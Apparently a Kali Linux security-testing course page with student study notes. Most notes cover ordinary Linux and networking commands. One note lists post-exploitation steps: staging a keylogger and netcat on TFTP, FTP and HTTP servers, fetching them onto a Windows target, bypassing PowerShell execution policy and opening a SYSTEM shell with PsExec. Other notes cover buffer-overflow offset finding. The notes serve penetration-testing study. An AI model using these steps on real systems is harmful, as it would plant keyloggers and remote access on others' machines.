846人加入学习
(36人评价)
Kali Linux安全测试

爆款好课 NO.1

价格 ¥ 599.00
该课程属于 武官课程 请加入后再学习

www.shodan.io  爬网

net:211.144.145.0/24

[展开全文]

1. dpkg -L fierce  当查看前程序生成的相关文件。

通过区域传输,得到DNS记录传输,A记录,IP地址记录,从而判断内网服务主机情况。而通常使用DNS字典爆破工具。

[展开全文]

1.  tcpdump -n -r http.cap |awk '{print $3}' |sort -u

-n 为不解析成域名,只显示IP,awk 默认以空格分割开来,此处显示第三列数据,sort -u 为剔除相同项数据。

[展开全文]

到目前为止的课程,所介绍的工具中,最好的和最有用的就是nmap

[展开全文]

windows下:
修改账户密码     net user admin *
查看    net user
查看账号情况  net user admin
计划任务 at                       (/?查看使用方法,win10已经启用)
 

[展开全文]
aveng · 2017-09-05 · 本地提权 0

获取exp
例如在shell中:  searchsploit slmail
                          cp /usr/share/exploitdb/windows/remote/646.c


 

使用TFTP传输文件
mkdir /tftp    (创建目录)
chown -R  nobody /tftp   (赋予权限)
cp /usr/share/windows-binaries/   (这里面有一些win下的工具)
cp /usr/share/windows-binaries/ woami.exe /tftp/
cp /usr/share/windows-binaries/ klogger.exe /tftp/
(拷了两个工具到tftp)
atftpd --daemon --port 69 /tftp
netstat -panu | grep 69   (inetd是由于权限的问题     ls /tftp/ -dl  
cd /ftp                  ls -l                chown -Rnobody /tftp/  也就是将所有文件权限全部改为nobody  )

在win端:    tftp -i 192.168.1.117 get klogger.exe     获取文件


FTP
apt-get install pure-ftp
ftp配置脚本:

#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd yuanfh -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

配置好后拷贝文件
cp /tftp/* /ftphome/

通过在win端写入执行文件,再远程命令运行这个文件夹,来开始下载文件
echo open 192.168.*.*>ftp.txt
echo yuanfh>> ftp.txt
echo password>>ftp.txt
echo bin>>ftp.txt
echo GET whoani.exe>>ftp.txt
echo GET klogger.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt

VBscript
利用http协议下载脚本
service apache2 start
netstat -pantu | grep:80
再cp文件
脚本传过去之后执行命令
csript wgetvbs http://192.168.1.117/nc.exe nc.exe

Powershell
powershell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -NoProfile -Flie Wger.ps1

使用DEBUG传输文件
  Debug 1.汇编反汇编  2.  16进制DUMP工具    3.    64K字节
先用UPX压缩文件  upx -9 nc.exe
再用wine的软件将nc转化成hex文件 wine /usr/share.windows-binaries/exe2.bat.exe nc.exe nc.hex
  debug <nc.hex
  copy 1.dll nc.exe

[展开全文]

whoami.exe

PsExec.exe -i -s cmd

[展开全文]

immunity debugger
输入栏输入!mona modules (!执行 mona脚本)
!mona find -s "\xff\xe4" -m openc32.dll (要查找jmp esp 的内存指令,到linux下cd /usr/share/metasploit-framework/tools中利用nasm_shell.rb,将汇编语言转换为二进制语言  ffe4)

为了防止payload直接执行被覆盖,所以定向esp之后加了 “\x90”*8    在家payload

[展开全文]
aveng · 2017-08-28 · FUZZING 0

cd /usr/share/metaspolit-framwork/tools

./pattern_create.rb 数字
自动生成唯一字符串

./pattern_offset.rb  寄存器十六进制数据
自动定位字符串所在位置。必须在tools目录下

[展开全文]
aveng · 2017-08-26 · POP3 0

注意导入虚拟电脑的 内存  最低保存4096,也就是4个G的内存。

[展开全文]
aveng · 2017-08-20 · NEXPOSE 0

/etc/apt/apt.conf     apt-get请求源

[展开全文]
hhtc_su · 2017-08-13 · 洋葱路由 0

.bashrc  //

hdparm -i /dev/sda if AdvancedPM=yes then hdparm -B 1 -S 12 /dev/sda

[展开全文]

代理功能

 

 

主动扫描

1、配置代理功能

1)general

给vaga设置代理服务器

2、proxy服务器

vaga充当客户端的浏览器,需要符合浏览器的一些特征

 

 

代理模式下:

被动的数据分析,有流量经过代理服务器,就会对数据进行分析

[展开全文]
xinyongzhe · 2017-08-14 · vega 0

熟悉常用命令:

ls、pwd、cat 、more、tail、less、watch、cp、rm、move、top、ps、grep、ifconfig、netstart、awk、sort、route、mount、dmesg、find、

kali默认采用bash(使用env查看shell类型)

ls -l   显出列表,起中:

     b表示块设备(磁盘)

     d 表示文件

     c 表示字符型设备

     l 表示链接文件

【文件类型】【创建者权限】【同组者权限】【其他组者权限】

eg: drwxr_xr_x

watch -n【时间时长,默认秒】 {后续执行命令}

eg:  watch -n 2 tail -20 /var/log/message

cp 【-r  拷贝目录】

rm 【-r 删除目录】

ps 【-ef 详细服务进程】

ps 【-aux 内核进程及所占CPU】

macchanger -m xx:xx:xx:xx:xx:xx eth0 修改eth0 MAC地址

netstart -pantu 查看本机TCP与UDP链接

netstart -pantu | egrep -v '0.0.0.0|:::' |awk '{print $5}'  过滤包含0.0.0.0与:::地址并且只显示第五列信息。

/etc/resolv.conf DNS配置文件

 

 

[展开全文]

一、拷贝系统到U盘

dmesg 系统日志(含硬件)

dd if=【文件源】 of=【目标源】bs=【每次拷贝块大小】

dd if=kali-linux.iso of=/dev/sdb bs=1M

watch -n 5 killall -USR1 dd //每5s发送dd进程进展。

 

二、LUKS加密方法:

windows ---DoxBox

后段:dm-crypt

前段:cryptsetup

微软的bitlocker

 

三、分区制作:

parted 分区工具

print devices 查看当前挂载分区

select /dev/sdb  选择/dev/sdb 分区

print 查看当前分区信息

mkpart primary(主分区) 3063(起始位置) 7063(结束位置)

 

四、加密分区

cryptsetup --verbose --verify-passphrase luksFormat /dev/sdb3  将分区/dev/sdb3使用luks加密

cryptsetup luksOpen /dev/sdb3 usb 打开加密分区 /dev/sdb3 并挂载目录usb下(默认在/dev/mapper/usb 下)。

mkfs.ext4 /dev/mapper/usb 使用mkfs将usb目录文件格式化成 ext4格式。

e2label /dev/mapper/usb persistence 将卷标标为持久型。

mkdir -p /mnt/usb

mount /dev/mapper/usb  /mnt/usb/

echo "/ union" > /mnt/usb/persistence.conf 将“/ union”将字符传递给持久加密USB配置文件。

umount /dev/mapper/usb

cryptsetup luksClose /dev/mapper/usb 关闭加密分区

 

五、熟悉环境

字体调整 gnome-tweak-tool

监视网络流量

apt-get install netspeed 安装netspeed网络流量监控软件

 

 

 

 

 

 

 

[展开全文]